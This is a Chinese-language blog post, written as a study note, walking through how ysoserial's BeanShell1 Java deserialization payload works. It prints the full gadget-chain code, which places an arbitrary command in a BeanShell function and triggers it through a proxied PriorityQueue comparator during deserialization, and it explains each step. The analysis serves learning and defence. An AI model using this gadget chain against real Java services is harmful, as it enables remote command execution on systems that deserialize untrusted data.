<!doctype html>



  


<html class="theme-next mist use-motion">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css">


  <meta name="keywords" content="安全学习,Java,">








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1">






<meta name="description" content="简介ysoserial是github上一个Java反序列化工具框架，它包含常见的Java反序列化类型，包含Jenkins，WebLogic及JBoss等反序列化漏洞的利用Payload，及其生成过程。今天分析的BeanShell1只是其中的一个例子，当中用到很多Java中比较高深的技术，学习反序列化的同时，一并学习下Java。">
<meta name="keywords" content="安全学习,Java">
<meta property="og:type" content="article">
<meta property="og:title" content="Java反序列化框架ysoserial学习">
<meta property="og:url" content="http://1codelife.com/2017/09/17/Java-deserial-learning1/index.html">
<meta property="og:site_name" content="1CodeLife">
<meta property="og:description" content="简介ysoserial是github上一个Java反序列化工具框架，它包含常见的Java反序列化类型，包含Jenkins，WebLogic及JBoss等反序列化漏洞的利用Payload，及其生成过程。今天分析的BeanShell1只是其中的一个例子，当中用到很多Java中比较高深的技术，学习反序列化的同时，一并学习下Java。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-03-02T14:29:14.456Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Java反序列化框架ysoserial学习">
<meta name="twitter:description" content="简介ysoserial是github上一个Java反序列化工具框架，它包含常见的Java反序列化类型，包含Jenkins，WebLogic及JBoss等反序列化漏洞的利用Payload，及其生成过程。今天分析的BeanShell1只是其中的一个例子，当中用到很多Java中比较高深的技术，学习反序列化的同时，一并学习下Java。">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="http://1codelife.com/2017/09/17/Java-deserial-learning1/">

  <title> Java反序列化框架ysoserial学习 | 1CodeLife </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  


<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
          m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-91250021-1', 'auto');
  ga('send', 'pageview');
</script>


  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?826cac467c757190b2c8aa720a31068d";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>








  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">1CodeLife</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                Java反序列化框架ysoserial学习
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2017-09-17T11:19:00+08:00" content="2017-09-17">
              2017-09-17
            </time>
          </span>

          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2017/09/17/Java-deserial-learning1/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2017/09/17/Java-deserial-learning1/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p><a href="https://github.com/frohoff/ysoserial" target="_blank" rel="noopener">ysoserial</a>是github上一个Java反序列化工具框架，它包含常见的Java反序列化类型，包含Jenkins，WebLogic及JBoss等反序列化漏洞的利用Payload，及其生成过程。今天分析的BeanShell1只是其中的一个例子，当中用到很多Java中比较高深的技术，学习反序列化的同时，一并学习下Java。<br><a id="more"></a></p>
<h2 id="BeanShell1"><a href="#BeanShell1" class="headerlink" title="BeanShell1"></a>BeanShell1</h2><p>这个Payload是利用BeanShell实现的，实现过程也比较巧妙。BeanShel是Java的动态脚本解释器，可以让Java项脚本语言一样运行。开始我们的代码分析了，ysoserial可以从Github上clone，我是在Eclipse中编译的。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">	public class BeanShell1 extends PayloadRunner implements ObjectPayload&lt;PriorityQueue&gt; &#123;</span><br><span class="line"></span><br><span class="line">    public PriorityQueue getObject(String command) throws Exception &#123;</span><br><span class="line">	// BeanShell payload</span><br><span class="line">	String payload = &quot;compare(Object foo, Object bar) &#123;new java.lang.ProcessBuilder(new String[]&#123;\&quot;&quot; + command + &quot;\&quot;&#125;).start();return new Integer(1);&#125;&quot;;</span><br><span class="line"></span><br><span class="line">	// Create Interpreter</span><br><span class="line">	Interpreter i = new Interpreter();</span><br><span class="line"></span><br><span class="line">	// Evaluate payload</span><br><span class="line">	i.eval(payload);</span><br><span class="line"></span><br><span class="line">	// Create InvocationHandler</span><br><span class="line">	XThis xt = new XThis(i.getNameSpace(), i);</span><br><span class="line">	InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), &quot;invocationHandler&quot;).get(xt);</span><br><span class="line"></span><br><span class="line">	// Create Comparator Proxy</span><br><span class="line">	Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class&lt;?&gt;[]&#123;Comparator.class&#125;, handler);</span><br><span class="line"></span><br><span class="line">	// Prepare Trigger Gadget (will call Comparator.compare() during deserialization)</span><br><span class="line">	final PriorityQueue&lt;Object&gt; priorityQueue = new PriorityQueue&lt;Object&gt;(2, comparator);</span><br><span class="line">	Object[] queue = new Object[] &#123;1,1&#125;;</span><br><span class="line">	Reflections.setFieldValue(priorityQueue, &quot;queue&quot;, queue);</span><br><span class="line">	Reflections.setFieldValue(priorityQueue, &quot;size&quot;, 2);</span><br><span class="line"></span><br><span class="line">	return priorityQueue;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public static void main(final String[] args) throws Exception &#123;</span><br><span class="line">	PayloadRunner.run(BeanShell1.class, args);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>从代码可以看出，BeanShell1继承自PayloadRunner，实现了ObjectPayload接口。它定义了一个函数getObject,这个是接口ObjectPayload要求的，也是整个框架中的重要组成，后面会详细分析。同样还有一个静态的主函数main，作为程序运行的入口。<br>PayloadRunner并不是直接接受输入的命令，BeanShell1作为其子类，才是反序列化真正的入口。从代码的追开始看起。</p>
<h2 id="BeanShell1的main函数"><a href="#BeanShell1的main函数" class="headerlink" title="BeanShell1的main函数"></a>BeanShell1的main函数</h2><p>真正的入口在BeanShell1中的main函数中，调用方式为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PayloadRunner.run(BeanShell1.class, args)</span><br></pre></td></tr></table></figure>
<p>args就是传入的命令了。BeanShell1是关键。BeanShell1.class的调用是用来获取BeanShell1这个类的运行时类。如果是一个对象实例的话，可以通过object.getClass()来获取。这个方法时定义在Object类中。运行时类Runtime Class是Java中很多黑魔法的开始，也使得Java功能强大的原因之一。这里，我们只需要记住，PayloadRunner.run接受的第1个参数是BeanShell1的运行时类就OK了。</p>
<h2 id="PayloadRunner-run函数"><a href="#PayloadRunner-run函数" class="headerlink" title="PayloadRunner.run函数"></a>PayloadRunner.run函数</h2><p>开始跟踪PayloadRunner.run函数的调用轨迹。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">public class PayloadRunner &#123;</span><br><span class="line">	public static void run(final Class&lt;? extends ObjectPayload&lt;?&gt;&gt; clazz, final String[] args) throws Exception &#123;</span><br><span class="line">		// ensure payload generation doesn&apos;t throw an exception</span><br><span class="line">		byte[] serialized = new ExecCheckingSecurityManager().wrap(new Callable&lt;byte[]&gt;()&#123;</span><br><span class="line">			public byte[] call() throws Exception &#123;</span><br><span class="line">				final String command = args.length &gt; 0 &amp;&amp; args[0] != null ? args[0] : &quot;calc.exe&quot;;</span><br><span class="line"></span><br><span class="line">				System.out.println(&quot;generating payload object(s) for command: &apos;&quot; + command + &quot;&apos;&quot;);</span><br><span class="line"></span><br><span class="line">				ObjectPayload&lt;?&gt; payload = clazz.newInstance();</span><br><span class="line">                final Object objBefore = payload.getObject(command);</span><br><span class="line"></span><br><span class="line">				System.out.println(&quot;serializing payload&quot;);</span><br><span class="line">				byte[] ser = Serializer.serialize(objBefore);</span><br><span class="line">				Utils.releasePayload(payload, objBefore);</span><br><span class="line">                return ser;</span><br><span class="line">		&#125;&#125;);</span><br><span class="line"></span><br><span class="line">		try &#123;</span><br><span class="line">			System.out.println(&quot;deserializing payload&quot;);</span><br><span class="line">			final Object objAfter = Deserializer.deserialize(serialized);</span><br><span class="line">		&#125; catch (Exception e) &#123;</span><br><span class="line">			e.printStackTrace();</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>从代码中看出这个函数很小，功能很简单，生成了Payload的序列化字节码serialized ，交由Deserializer进行反序列化，触发Payload执行。下面来看具体的生成流程。</p>
<h3 id="字节码的生成"><a href="#字节码的生成" class="headerlink" title="字节码的生成"></a>字节码的生成</h3><ul>
<li>通过包装函数ExecCheckingSecurityManager了一段代码，为什么要加一个层安全管理，这个现在还不知道。一定有它的原因，随后再学习了。</li>
<li>判断传入的args,生成命令字符串。</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ObjectPayload&lt;?&gt; payload = clazz.newInstance();</span><br><span class="line">final Object objBefore = payload.getObject(command);</span><br></pre></td></tr></table></figure>
<ul>
<li>首先通过运行时类，直接获取一个对象实例，然后，调用getObject函数，生成待序列化的对象。  </li>
<li>getObject函数<br>getObject函数定义在BeanShell1中，因为BeanShell1实现了ObjectPayload接口，所以一定要定义getObject函数，这也是yso反序列化框架里最最重的一个函数。  </li>
</ul>
<ol>
<li>首先生成了payload字符串，也就是要执行的命令，这里可以看到是一个Java的函数的文本形式。</li>
<li>下面生成了一个BeanShell的解释器Interpreter实例，BeanShell是Java的一个工具包，用来以脚本形式来执行Java代码的方式。当然可以把它嵌入到正常的Java代码中去，这就是bsh.Interpreter.</li>
<li>调用实例的eval函数来解析payload，当然解析成功也不会执行，因为是一个函数，而且记着我们现在是getObject中，正在生成payload序列过程中，此时当然不能执行命令了。我们需要的是在反序列化时执行命令。<br>可以这样理解，当BeanShell解析过payload后，只是在解析器实例的命名空间中生成了一个函数。我们也知道了，执行命令的关键在于如何触发这个函数的执行。</li>
<li>下面一行，生成了一个XThis实例，代码里的注释告诉我们，这是为了创建一个触发器InovcationHandler，通过查看源码我们知道XThis实例就代表了那段解析过的payload，也就是说生成那个compare函数，就是XThis实例的函数了。</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), &quot;invocationHandler&quot;).get(xt);</span><br></pre></td></tr></table></figure>
<p>这行代码就是链式调用，首先是调用getFileld函数，得到invocationHandler的成员(Field类实例)，通过查看源码，可以知道，XThis对象是有一个公有成员，invocationHandler的，我们知道，一个类的实例的成员，是不能直接访问的，要通过obj.member，这样的形式访问的，这里应该是Java的一个黑魔法之一，可以直接访问一个对象的对象实例。至于这是怎么实现的，后面再研究了。<br>返回了这个对象的Field实例后，又调用了Field的get函数，想必这就是返回真正的InvocationHandler 对象了，果不其然，在XThis中，invocationHandler成员的类型正是InvocationHandler接口。<br>也就是说InvocationHandler在被调用时，会自动调用它的函数invoke。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class&lt;?&gt;[]&#123;Comparator.class&#125;, handler);</span><br></pre></td></tr></table></figure>
<p>这段代码生成了一比较器代理，用于随后的优先队列。</p>
<ol start="5">
<li>最后的反序列对象</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">final PriorityQueue&lt;Object&gt; priorityQueue = new PriorityQueue&lt;Object&gt;(2, comparator);</span><br><span class="line">			Object[] queue = new Object[] &#123;1,1&#125;;</span><br><span class="line">			Reflections.setFieldValue(priorityQueue, &quot;queue&quot;, queue);</span><br><span class="line">			Reflections.setFieldValue(priorityQueue, &quot;size&quot;, 2);</span><br></pre></td></tr></table></figure>
<p>剩下的就比较好理解了，生成了一个优先队列，设定它的比较器为刚刚生成的比较器，给它添加了两个对象成员。为什么要添加两个对象呢，因为我们要触发comparator函数，优先队列有两个元素时，会自动触发一次比较。<br>然后返回这个对象。</p>
<h3 id="生成序列码"><a href="#生成序列码" class="headerlink" title="生成序列码"></a>生成序列码</h3><p>根据返回的优先队列的对象，进行序列化，生成了序列化字节码，用于后面的反序列化。</p>
<h3 id="进行反序列化操作"><a href="#进行反序列化操作" class="headerlink" title="进行反序列化操作"></a>进行反序列化操作</h3><p>PayloadRunner.run函数最后对生成的序列化字节码进行反序列化操作。触发命令执行。</p>
<h2 id="命令执行的触发流程"><a href="#命令执行的触发流程" class="headerlink" title="命令执行的触发流程"></a>命令执行的触发流程</h2><p>最后也时最精彩的部分了，反序列化时，生成了一个优先队列对象，然后恢复这个对象里的数据，因为在生成序列化对象时，我们给它里面塞了两个对象。当它恢复时，它自动执行了comapator代理的invocationHandler，也就执行了BeanShell1中动态添加的方法，从前面流程可以看到，我们定义在这个函数里的命令，也就会得到执行了。<br>这也是这个漏洞利用的最巧妙的地方。</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>整个命令执行的过程比较简单，但其中用到几个Java高级技术，还需要进一步学习。</p>
<ol>
<li>Reflections机制，如何把一个对象的成员单独拎出来，可以将由其他对象访问。</li>
<li>InvocationHandler接口，一般来说接口是不能实例化的，但在代码中看到了把一个对象转化为接口实例。</li>
<li>Java的代理机制。</li>
</ol>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/安全学习/" rel="tag">#安全学习</a>
          
            <a href="/tags/Java/" rel="tag">#Java</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/07/31/how-to-learn-JavaScript/" rel="next" title="how to learn JavaScript？">
                <i class="fa fa-chevron-left"></i> how to learn JavaScript？
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/10/01/java-reflection-learn-md/" rel="prev" title="Java反射机制学习">
                Java反射机制学习 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2017/09/17/Java-deserial-learning1/" data-title="Java反序列化框架ysoserial学习" data-url="http://1codelife.com/2017/09/17/Java-deserial-learning1/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="https://octodex.github.com/images/skitchtocat.png" alt="Quay & LinLin">
          <p class="site-author-name" itemprop="name">Quay & LinLin</p>
          <p class="site-description motion-element" itemprop="description"></p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">24</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">14</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              
                <span class="site-state-item-count">38</span>
                <span class="site-state-item-name">标签</span>
              
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#简介"><span class="nav-number">1.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#BeanShell1"><span class="nav-number">2.</span> <span class="nav-text">BeanShell1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#BeanShell1的main函数"><span class="nav-number">3.</span> <span class="nav-text">BeanShell1的main函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PayloadRunner-run函数"><span class="nav-number">4.</span> <span class="nav-text">PayloadRunner.run函数</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#字节码的生成"><span class="nav-number">4.1.</span> <span class="nav-text">字节码的生成</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#生成序列码"><span class="nav-number">4.2.</span> <span class="nav-text">生成序列码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#进行反序列化操作"><span class="nav-number">4.3.</span> <span class="nav-text">进行反序列化操作</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#命令执行的触发流程"><span class="nav-number">5.</span> <span class="nav-text">命令执行的触发流程</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#总结"><span class="nav-number">6.</span> <span class="nav-text">总结</span></a></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Quay & LinLin</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="http://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"quay"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
    <script src="/vendors/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
    <script src="/js/src/hook-duoshuo.js"></script>
  






  
  

  

  

  

</body>
</html>
